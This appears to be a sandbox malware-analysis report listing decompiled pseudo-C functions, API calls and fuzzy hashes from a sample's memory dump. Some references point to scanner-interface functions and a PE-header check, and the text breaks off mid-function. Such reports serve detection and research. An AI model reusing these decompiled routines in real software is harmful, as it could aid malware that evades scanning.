                                                                                                • API ID: ErrorLibraryLoadMode
                                                                                                • String ID:
                                                                                                • API String ID: 2987862817-0
                                                                                                • Opcode ID: df94ad116ebcaa672ce793ff816d76859a309ad176ddeb8ba2e999a39403c04a
                                                                                                • Instruction ID: b848cba1c70743bc20ec0825f0abe35c6753bfcbc0a23ad1abd7e674e4792b91
                                                                                                • Opcode Fuzzy Hash: df94ad116ebcaa672ce793ff816d76859a309ad176ddeb8ba2e999a39403c04a
                                                                                                • Instruction Fuzzy Hash: 69F0A770654744BFEB115F75CC5182BBBFDE78DB5075348B1F80193650E7394810C960
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02175AA8(void* __eax) {
                                                                                                				char _v272;
                                                                                                				intOrPtr _t14;
                                                                                                				void* _t16;
                                                                                                				intOrPtr _t18;
                                                                                                				CHAR* _t19;
                                                                                                
                                                                                                				_t16 = __eax;
                                                                                                				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                                					_t3 = _t16 + 4; // 0x2170000
                                                                                                					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                                                					_t14 = E02175D0C(_t19); // executed
                                                                                                					_t18 = _t14;
                                                                                                					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                                					if(_t18 == 0) {
                                                                                                						_t5 = _t16 + 4; // 0x2170000
                                                                                                						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                                                					}
                                                                                                				}
                                                                                                				_t7 = _t16 + 0x10; // 0x2170000
                                                                                                				return  *_t7;
                                                                                                			}









                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 02175AC6
                                                                                                  • Part of subcall function 02175D0C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02170000,021907B4), ref: 02175D28
                                                                                                  • Part of subcall function 02175D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D46
                                                                                                  • Part of subcall function 02175D0C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02170000,021907B4), ref: 02175D64
                                                                                                  • Part of subcall function 02175D0C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02175D82
                                                                                                  • Part of subcall function 02175D0C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02175DCB
                                                                                                  • Part of subcall function 02175D0C: RegQueryValueExA.ADVAPI32(?,02175F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02175E11,?,80000001), ref: 02175DE9
                                                                                                  • Part of subcall function 02175D0C: RegCloseKey.ADVAPI32(?,02175E18,00000000,?,?,00000000,02175E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02175E0B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                • String ID:
                                                                                                • API String ID: 2796650324-0
                                                                                                • Opcode ID: 47e13ebab32659183f83e9484014392e770a5945ea1bfc9bf7870af31faf625a
                                                                                                • Instruction ID: 7a201efa8caa1a3654b5475515044a7bee8ae39ebecb80e3f19bf4bcfc14d399
                                                                                                • Opcode Fuzzy Hash: 47e13ebab32659183f83e9484014392e770a5945ea1bfc9bf7870af31faf625a
                                                                                                • Instruction Fuzzy Hash: 63E06D71A40214AFCB10DE58C8C1B4777E9AB48750F400661EC58CF246D3B1D9148BD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E0217807C(void* __eax, long __ecx, void* __edx) {
                                                                                                				long _v16;
                                                                                                				int _t4;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                                                                                				if(_t4 == 0) {
                                                                                                					_v16 = 0xffffffff;
                                                                                                				}
                                                                                                				return _v16;
                                                                                                			}






                                                                                                APIs
                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02178090
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
                                                                                                • Instruction ID: e27e742800a50f4cc9e112830b3babbd221be575d513a862cb253cb12c93ecdd
                                                                                                • Opcode Fuzzy Hash: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
                                                                                                • Instruction Fuzzy Hash: 1AD05B723081507FD324956A5D44EA79BECDBC5771F11073DF558C3180D7208C0586B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E021780F8(void* __eax) {
                                                                                                				signed char _t5;
                                                                                                
                                                                                                				_t5 = GetFileAttributesA(E02174D64(__eax)); // executed
                                                                                                				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					return 1;
                                                                                                				}
                                                                                                			}





                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02189493,ScanString,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178103
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: b5b9d6dd6696097a2bfe1c09360b8a481e568112e44ccac4018eab4fc1ad6852
                                                                                                • Instruction ID: cea692c5bd633206df280d0e0579e372b7b769a4c096fe88aa0965c3832d574c
                                                                                                • Opcode Fuzzy Hash: b5b9d6dd6696097a2bfe1c09360b8a481e568112e44ccac4018eab4fc1ad6852
                                                                                                • Instruction Fuzzy Hash: 39C08CA17C17000E1A2061BC0CCD04A02A84AC533C3251B71E468C22D1D32280173810
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217811C(void* __eax) {
                                                                                                				signed char _t5;
                                                                                                
                                                                                                				_t5 = GetFileAttributesA(E02174D64(__eax)); // executed
                                                                                                				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					return 1;
                                                                                                				}
                                                                                                			}





                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0218A7E7,ScanString,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178127
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0218EC48(int __eax) {
                                                                                                				int _t3;
                                                                                                
                                                                                                				_t3 = timeSetEvent(__eax, 0, E0218EC3C, 0, 1); // executed
                                                                                                				 *0x2194b6c = _t3;
                                                                                                				return _t3;
                                                                                                			}




                                                                                                0x0218ec58
                                                                                                0x0218ec5d
                                                                                                0x0218ec63

                                                                                                APIs
                                                                                                • timeSetEvent.WINMM(00002710,00000000,0218EC3C,00000000,00000001), ref: 0218EC58
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Eventtime
                                                                                                • String ID:
                                                                                                • API String ID: 2982266575-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 50%
                                                                                                			E0217CB23() {
                                                                                                				int _t4;
                                                                                                				intOrPtr _t7;
                                                                                                				void* _t8;
                                                                                                
                                                                                                				_pop(_t7);
                                                                                                				 *[fs:eax] = _t7;
                                                                                                				_push(E0217CB41);
                                                                                                				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
                                                                                                				return _t4;
                                                                                                			}







                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(?,0217CB41), ref: 0217CB34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217CB3F() {
                                                                                                				int _t3;
                                                                                                				void* _t4;
                                                                                                
                                                                                                				_t3 = SetErrorMode( *(_t4 - 0xc)); // executed
                                                                                                				return _t3;
                                                                                                			}





                                                                                                0x0217cb34
                                                                                                0x0217cb39

                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(?,0217CB41), ref: 0217CB34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E021715FC(signed int __eax) {
                                                                                                				void* _t4;
                                                                                                				intOrPtr _t7;
                                                                                                				signed int _t8;
                                                                                                				void* _t10;
                                                                                                				void** _t15;
                                                                                                				void* _t17;
                                                                                                
                                                                                                				_t8 = __eax;
                                                                                                				E02171590(__eax);
                                                                                                				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
                                                                                                				if(_t4 == 0) {
                                                                                                					 *0x2191718 = 0;
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					_t15 =  *0x2191704; // 0x4a30000
                                                                                                					_t10 = _t4;
                                                                                                					 *_t10 = 0x2191700;
                                                                                                					 *0x2191704 = _t4;
                                                                                                					 *(_t10 + 4) = _t15;
                                                                                                					 *_t15 = _t4;
                                                                                                					_t17 = _t4 + 0x140000;
                                                                                                					 *((intOrPtr*)(_t17 - 4)) = 2;
                                                                                                					 *0x2191718 = 0x13fff0 - _t8;
                                                                                                					_t7 = _t17 - _t8;
                                                                                                					 *0x2191714 = _t7;
                                                                                                					 *(_t7 - 4) = _t8 | 0x00000002;
                                                                                                					return _t7;
                                                                                                				}
                                                                                                			}










                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02171A33), ref: 02171612
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E021716B2(intOrPtr __eax) {
                                                                                                				void* _t6;
                                                                                                				void** _t9;
                                                                                                				void* _t11;
                                                                                                				void* _t15;
                                                                                                				long _t20;
                                                                                                				intOrPtr _t24;
                                                                                                
                                                                                                				_t24 = __eax;
                                                                                                				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                                                                				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
                                                                                                				_t11 = _t6;
                                                                                                				if(_t11 != 0) {
                                                                                                					_t15 = _t11;
                                                                                                					 *((intOrPtr*)(_t15 + 8)) = _t24;
                                                                                                					 *(_t15 + 0xc) = _t20 | 0x00000004;
                                                                                                					E02171674();
                                                                                                					_t9 =  *0x21937a8; // 0x7f9f0000
                                                                                                					 *_t15 = 0x21937a4;
                                                                                                					 *0x21937a8 = _t11;
                                                                                                					 *(_t15 + 4) = _t9;
                                                                                                					 *_t9 = _t11;
                                                                                                					 *0x21937a0 = 0;
                                                                                                					_t11 = _t11 + 0x10;
                                                                                                				}
                                                                                                				return _t11;
                                                                                                			}










                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 021716D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E02171716(void* __eax) {
                                                                                                				void* _t5;
                                                                                                				signed int _t6;
                                                                                                				signed int _t7;
                                                                                                				void* _t10;
                                                                                                				void* _t13;
                                                                                                				void _t16;
                                                                                                
                                                                                                				_t10 = __eax - 0x10;
                                                                                                				E02171674();
                                                                                                				_t5 = _t10;
                                                                                                				_t16 =  *_t5;
                                                                                                				_t13 =  *(_t5 + 4);
                                                                                                				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
                                                                                                				if(_t6 == 0) {
                                                                                                					_t7 = _t6 | 0xffffffff;
                                                                                                				} else {
                                                                                                					 *_t13 = _t16;
                                                                                                					 *(_t16 + 4) = _t13;
                                                                                                					_t7 = 0;
                                                                                                				}
                                                                                                				 *0x21937a0 = 0;
                                                                                                				return _t7;
                                                                                                			}










                                                                                                APIs
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02171734
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1263568516-0
                                                                                                • Opcode ID: 46bdf2f33713a27f3391fe62cc3479306ca00a7fdfe2610301c26b9a82010347
                                                                                                • Instruction ID: 7e9c1cfb627e5fdffaa370dd7d46a1333220cd8f26cd70c2cad0a43ab08ce225
                                                                                                • Opcode Fuzzy Hash: 46bdf2f33713a27f3391fe62cc3479306ca00a7fdfe2610301c26b9a82010347
                                                                                                • Instruction Fuzzy Hash: 2EE086B53803017FD7105ABA5D44B126BECEB99650F144475F509DB251D370E8048B60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E021854F4() {
                                                                                                
                                                                                                				if( *0x219448c == 0) {
                                                                                                					 *0x219448c = GetModuleHandleA("kernel32.dll");
                                                                                                					if( *0x219448c != 0) {
                                                                                                						 *0x2194490 = GetProcAddress( *0x219448c, "CreateToolhelp32Snapshot");
                                                                                                						 *0x2194494 = GetProcAddress( *0x219448c, "Heap32ListFirst");
                                                                                                						 *0x2194498 = GetProcAddress( *0x219448c, "Heap32ListNext");
                                                                                                						 *0x219449c = GetProcAddress( *0x219448c, "Heap32First");
                                                                                                						 *0x21944a0 = GetProcAddress( *0x219448c, "Heap32Next");
                                                                                                						 *0x21944a4 = GetProcAddress( *0x219448c, "Toolhelp32ReadProcessMemory");
                                                                                                						 *0x21944a8 = GetProcAddress( *0x219448c, "Process32First");
                                                                                                						 *0x21944ac = GetProcAddress( *0x219448c, "Process32Next");
                                                                                                						 *0x21944b0 = GetProcAddress( *0x219448c, "Process32FirstW");
                                                                                                						 *0x21944b4 = GetProcAddress( *0x219448c, "Process32NextW");
                                                                                                						 *0x21944b8 = GetProcAddress( *0x219448c, "Thread32First");
                                                                                                						 *0x21944bc = GetProcAddress( *0x219448c, "Thread32Next");
                                                                                                						 *0x21944c0 = GetProcAddress( *0x219448c, "Module32First");
                                                                                                						 *0x21944c4 = GetProcAddress( *0x219448c, "Module32Next");
                                                                                                						 *0x21944c8 = GetProcAddress( *0x219448c, "Module32FirstW");
                                                                                                						 *0x21944cc = GetProcAddress( *0x219448c, "Module32NextW");
                                                                                                					}
                                                                                                				}
                                                                                                				if( *0x219448c == 0 ||  *0x2194490 == 0) {
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					return 1;
                                                                                                				}
                                                                                                			}




                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0218577B,?,?,0218580D,00000000,021858E9), ref: 02185508
                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02185520
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02185532
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02185544
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02185556
                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02185568
                                                                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0218557A
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0218558C
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0218559E
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 021855B0
                                                                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 021855C2
                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 021855D4
                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 021855E6
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 021855F8
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0218560A
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0218561C
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0218562E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleModule
                                                                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                • API String ID: 667068680-597814768
                                                                                                • Opcode ID: 409016b2082a97ab38ad10fc0532867084e844af5c5ab2bfff0bed555d4b968c
                                                                                                • Instruction ID: 6519d094a979dcc735740a306b2e3275daa061ec9242e2db964f03586c7be777
                                                                                                • Opcode Fuzzy Hash: 409016b2082a97ab38ad10fc0532867084e844af5c5ab2bfff0bed555d4b968c
                                                                                                • Instruction Fuzzy Hash: E331FFB0AD0B55AFFF14BFA4D9C5A2A3BEAEB46700BD10965E011DF204D37488918F92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 54%
                                                                                                			E02183990(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				char _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				char _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				char _v84;
                                                                                                				char _v88;
                                                                                                				char _v92;
                                                                                                				intOrPtr _v96;
                                                                                                				char _v100;
                                                                                                				char _v104;
                                                                                                				char _v108;
                                                                                                				intOrPtr _v112;
                                                                                                				char _v116;
                                                                                                				char _v120;
                                                                                                				char _v124;
                                                                                                				intOrPtr _v128;
                                                                                                				char _v132;
                                                                                                				char _v136;
                                                                                                				char _v140;
                                                                                                				intOrPtr _v144;
                                                                                                				char _v148;
                                                                                                				char _v152;
                                                                                                				char _v156;
                                                                                                				intOrPtr _v160;
                                                                                                				char _v164;
                                                                                                				char _v168;
                                                                                                				char _v172;
                                                                                                				intOrPtr _v176;
                                                                                                				char _v180;
                                                                                                				char _v184;
                                                                                                				char _v188;
                                                                                                				intOrPtr _v192;
                                                                                                				char _v196;
                                                                                                				char _v200;
                                                                                                				char _v204;
                                                                                                				intOrPtr _v208;
                                                                                                				char _v212;
                                                                                                				char _v216;
                                                                                                				char _v220;
                                                                                                				char _v224;
                                                                                                				intOrPtr _v228;
                                                                                                				char _v232;
                                                                                                				char _v236;
                                                                                                				char _v240;
                                                                                                				intOrPtr _v244;
                                                                                                				char _v248;
                                                                                                				char _v252;
                                                                                                				char _v256;
                                                                                                				intOrPtr _v260;
                                                                                                				char _v264;
                                                                                                				char _v268;
                                                                                                				char _v272;
                                                                                                				intOrPtr _v276;
                                                                                                				char _v280;
                                                                                                				char _v284;
                                                                                                				void* _t164;
                                                                                                				short* _t181;
                                                                                                				intOrPtr _t186;
                                                                                                				intOrPtr* _t189;
                                                                                                				void* _t225;
                                                                                                				intOrPtr _t255;
                                                                                                				void* _t257;
                                                                                                				intOrPtr _t259;
                                                                                                				intOrPtr _t261;
                                                                                                				intOrPtr _t263;
                                                                                                				void* _t265;
                                                                                                				intOrPtr _t269;
                                                                                                				struct HINSTANCE__* _t303;
                                                                                                				struct HINSTANCE__* _t305;
                                                                                                				intOrPtr _t307;
                                                                                                				PVOID* _t309;
                                                                                                				void* _t310;
                                                                                                				long* _t312;
                                                                                                				intOrPtr _t313;
                                                                                                				PVOID* _t315;
                                                                                                				void* _t316;
                                                                                                				intOrPtr _t318;
                                                                                                				void* _t349;
                                                                                                				void* _t379;
                                                                                                				intOrPtr _t412;
                                                                                                				intOrPtr _t413;
                                                                                                				intOrPtr _t415;
                                                                                                				intOrPtr _t445;
                                                                                                				intOrPtr _t477;
                                                                                                				void* _t479;
                                                                                                				intOrPtr _t481;
                                                                                                				void* _t483;
                                                                                                				intOrPtr _t485;
                                                                                                				intOrPtr _t487;
                                                                                                				void* _t489;
                                                                                                				intOrPtr _t494;
                                                                                                				void* _t495;
                                                                                                				void* _t496;
                                                                                                				intOrPtr _t497;
                                                                                                				intOrPtr _t502;
                                                                                                				intOrPtr _t503;
                                                                                                				intOrPtr _t504;
                                                                                                				intOrPtr _t505;
                                                                                                				intOrPtr _t506;
                                                                                                				intOrPtr _t507;
                                                                                                				intOrPtr _t508;
                                                                                                				intOrPtr _t509;
                                                                                                				intOrPtr _t510;
                                                                                                				intOrPtr _t511;
                                                                                                				intOrPtr _t512;
                                                                                                				intOrPtr _t513;
                                                                                                				intOrPtr _t514;
                                                                                                				intOrPtr _t515;
                                                                                                				intOrPtr _t517;
                                                                                                				intOrPtr _t518;
                                                                                                				void* _t525;
                                                                                                				intOrPtr _t526;
                                                                                                				void* _t535;
                                                                                                				void* _t540;
                                                                                                				void* _t545;
                                                                                                				void* _t550;
                                                                                                				void* _t555;
                                                                                                				void* _t560;
                                                                                                				void* _t567;
                                                                                                				void* _t572;
                                                                                                				void* _t577;
                                                                                                				void* _t582;
                                                                                                				void* _t588;
                                                                                                				void* _t593;
                                                                                                				PVOID* _t594;
                                                                                                				PVOID* _t596;
                                                                                                				void* _t601;
                                                                                                				void* _t606;
                                                                                                				intOrPtr _t608;
                                                                                                				void* _t613;
                                                                                                				void* _t618;
                                                                                                				intOrPtr _t624;
                                                                                                				intOrPtr _t625;
                                                                                                				void* _t634;
                                                                                                				void* _t637;
                                                                                                				void* _t641;
                                                                                                
                                                                                                				_t641 = __fp0;
                                                                                                				_t620 = __esi;
                                                                                                				_t624 = _t625;
                                                                                                				_t496 = 0x23;
                                                                                                				do {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_t496 = _t496 - 1;
                                                                                                				} while (_t496 != 0);
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_t494 = __edx;
                                                                                                				_v8 = __eax;
                                                                                                				E02174D54(_v8);
                                                                                                				_push(_t624);
                                                                                                				_push(0x218442b);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t625;
                                                                                                				_t164 = E0217304C(0x270e);
                                                                                                				_push(_t164);
                                                                                                				L02183780();
                                                                                                				if(_t164 == 0) {
                                                                                                					E021748F4(0x2194438, 0x2184454);
                                                                                                				} else {
                                                                                                					E021748F4(0x2194438, 0x2184444);
                                                                                                				}
                                                                                                				_push(0x2184460);
                                                                                                				_push( *0x2194438);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98( &_v12, E02174D64(_v16));
                                                                                                				_push(_v12);
                                                                                                				_t497 =  *0x2194438; // 0x0
                                                                                                				E02174BB0( &_v24, _t497, 0x2184460);
                                                                                                				E02174A98( &_v20, E02174D64(_v24));
                                                                                                				_pop(_t525);
                                                                                                				E02183690(_v20, _t494, _t525, _t620);
                                                                                                				 *0x2194420 = _t494;
                                                                                                				_t181 =  *0x2194420; // 0x0
                                                                                                				if( *_t181 == 0x5a4d) {
